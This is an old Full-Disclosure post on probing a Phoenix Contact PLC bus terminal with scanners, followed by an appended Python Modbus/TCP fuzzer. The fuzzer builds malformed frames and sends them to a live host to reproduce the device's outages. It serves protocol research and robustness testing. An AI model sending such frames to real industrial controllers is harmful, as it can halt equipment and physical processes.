Re: [Full-disclosure] scada/plc gear

From: gmaggro (gmaggrorogers.com)
Date: Tue Jan 15 2008 - 12:04:49 CST


The Phoenix Contact 'FL IL 24 BK-PAC' arrived the other day. It is a
wonderfully German piece of DIN rail
(http://www3.telus.net/public/dt0116/items/dinrails.jpg) gear:

http://eshop.phoenixcontact.com/phoenix/images/productimages/large/20260_1000_int_04.jpg
http://eshop.phoenixcontact.com/phoenix/treeViewClick.do?UID=2862314

There is a two digit LED display on it, with a reset button underneath.
As soon as I saw that, I figured stability would be an issue. This
turned out to be a correct assumption. While the most aggressive of nmap
scans did not lock it up for me, Nessus (with everything enabled) did
every time. Normally the display reads '82' but when it goes south it
reads '88'.

In any case, nmap -TUVRC -p1-65535 shows TCP 80, 502, 1962 open along
with UDP 7, 161, 199, 1059, and 5500. Very interesting stuff. I've had
many dealings with networks of hundreds of thousands to millions of
nodes, and though the reasonable explanation is that I've forgotten it,
I don't ever recall seeing 1962/tcp and 5500/udp open. MAC prefix is
00:A0:45 (Phoenix Contact Gmbh & CO.). OS details, well... I severely
doubt this is a 3COM lan modem or Dell laser printer.

Hitting just 502 with crud caused it to stop responding within 10-30
seconds, but after a similarly short interval, 502 started responding again.

snmpwalking it gives a sysDescr of "Ethernet bus terminal", a sysName of
"FL IL 24 BK" and the ifDescr say "NET+ARM 10/100 Megabit Ethernet
Driver by NETSilicon" and "pNA+ Loopback Driver".

80 says "NET+ARM Web Server/1.00", and feels pretty snappy. The web
page, in addition to configuration options, also supplies a wiring
diagram and a mock-up of the faceplate with status LEDs, and other
reference information (status codes, etc).

Reading through the manual/PDFs for this device indicates that it uses
Interbus protocol, which has since been subsumed into something called
Profinet. Awesome - something new to explore.

I'd recommend picking up a FLIL24BK since it runs quite the profile of
interesting stuff in addition to modbus. I don't get why echo is there,
unless the developers thought it would serve as some kind of diagnostic
facility. It also responds quite differently to the mbread (from the
modbus-0.9 package) command.

-----------------------------

I was made aware of an interesting and easy-to-use fuzzing program that
contains modbus testing functionality:
http://www.beyondsecurity.com/bestorm_overview.html

Now it's too expensive for individual purchase (it appears to be geared
towards businesses) but they have a 30 minute time limited demo that is
quite functional. It's Windows only. Someone might find it valuable to
fire it up against a modbus target, along with a sniffer to see what's
going on. For beginners or GUI only folks, it would make a great
introduction.

Scapy (http://www.secdev.org/projects/scapy/) is proving a nice &
powerful framework for mucking around. It has a 'fuzz' command which,
though simple, ought to be enough to construct some very handy stuff.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
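The post above pokes at port 502 with "crud" and suggests Scapy's fuzz command and a commercial fuzzer, without showing what a Modbus/TCP frame actually looks like on the wire. The following is an added example, not code from the post or from the author: it builds the function code 3 (read holding registers) request that a tool like mbread sends, parses a reply strictly (MBAP length field, exception replies, byte count), and derives the malformed variants a fuzzer would throw at the length and quantity fields. The sample reply bytes are constructed here, not captured from the FL IL 24 BK; the function names and the small query() helper are this example's own.

```python
"""Modbus/TCP framing: build a read request, parse the reply, and derive
malformed variants of the kind a fuzzer throws at port 502 (added example)."""
import socket
import struct

MODBUS_TCP_PORT = 502
FC_READ_HOLDING_REGISTERS = 0x03
MAX_REGISTERS_PER_READ = 125          # spec limit for FC 3 is 0x7D registers
MAX_ADU_LENGTH = 260                  # 7-byte MBAP header + 253-byte PDU

# Modbus exception codes carried in the byte after an error function code (fc | 0x80)
EXCEPTION_NAMES = {1: "ILLEGAL FUNCTION", 2: "ILLEGAL DATA ADDRESS",
                   3: "ILLEGAL DATA VALUE", 4: "SLAVE DEVICE FAILURE"}


def build_read_holding_registers(transaction_id, unit_id, start_addr, quantity):
    """Return a complete MBAP+PDU frame for function code 3 (read holding registers)."""
    pdu = struct.pack(">BHH", FC_READ_HOLDING_REGISTERS, start_addr, quantity)
    # MBAP header: transaction id, protocol id (always 0 for Modbus), length of
    # everything after the length field (unit id + PDU), unit id.
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu


def parse_response(frame):
    """Parse a reply frame strictly; raise ValueError on anything inconsistent."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header + function code")
    tid, pid, length, uid = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError("protocol id %d is not Modbus" % pid)
    if length != len(frame) - 6:
        raise ValueError("length field %d vs %d bytes present" % (length, len(frame) - 6))
    fc = frame[7]
    result = {"transaction_id": tid, "unit_id": uid, "function": fc & 0x7F}
    if fc & 0x80:                      # exception reply: exactly one code byte follows
        if len(frame) != 9:
            raise ValueError("malformed exception reply")
        code = frame[8]
        result["exception"] = code
        result["exception_name"] = EXCEPTION_NAMES.get(code, "UNKNOWN")
        return result
    if fc != FC_READ_HOLDING_REGISTERS:
        raise ValueError("unexpected function code 0x%02x" % fc)
    byte_count = frame[8]
    data = frame[9:]
    if byte_count != len(data) or byte_count % 2:
        raise ValueError("byte count %d vs %d data bytes" % (byte_count, len(data)))
    result["registers"] = list(struct.unpack(">%dH" % (byte_count // 2), data))
    return result


def malformed_variants(frame):
    """Derive labelled malformed frames from a valid FC 3 request: the same
    shapes a protocol fuzzer produces for the MBAP and PDU fields."""
    tid, pid, length, uid = struct.unpack(">HHHB", frame[:7])
    pdu = frame[7:]
    return [
        ("length_oversized", struct.pack(">HHHB", tid, pid, 0xFFFF, uid) + pdu),
        ("length_zero", struct.pack(">HHHB", tid, pid, 0, uid) + pdu),
        ("protocol_id_nonzero", struct.pack(">HHHB", tid, 0xFFFF, length, uid) + pdu),
        ("truncated_pdu", frame[:9]),                      # cuts the start address in half
        ("quantity_over_limit", frame[:10] + struct.pack(">H", MAX_REGISTERS_PER_READ + 1)),
        ("quantity_zero", frame[:10] + struct.pack(">H", 0)),
        ("function_code_0xff", frame[:7] + b"\xff" + pdu[1:]),
        ("unit_id_broadcast", frame[:6] + b"\x00" + pdu),
        ("trailing_garbage", frame + b"\x00" * 256),       # pushes the ADU past 260 bytes
    ]


def query(host, frame, port=MODBUS_TCP_PORT, timeout=2.0):
    """Send one frame to a real target and return the raw reply (b'' on timeout).
    Not exercised offline; pair it with a sniffer as the post suggests."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(frame)
        try:
            return s.recv(MAX_ADU_LENGTH)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    req = build_read_holding_registers(1, 1, 0, 2)
    # Constructed sample reply (not captured from any device): registers 0x0102, 0x0304.
    sample_reply = bytes.fromhex("00010000000701030401020304")
    print("request :", req.hex())
    print("reply   :", parse_response(sample_reply))
    for label, data in malformed_variants(req):
        print("%-20s %s" % (label, data.hex()))
```

Sending each variant with query() and watching whether 502 keeps answering the next well-formed request is the cheapest way to reproduce the "stops responding for 10-30 seconds" behaviour described above; the strict parse_response() also tells you whether a device answers a bad frame with a proper exception reply (function code 0x83 plus a code byte) or with something that does not even match its own length field.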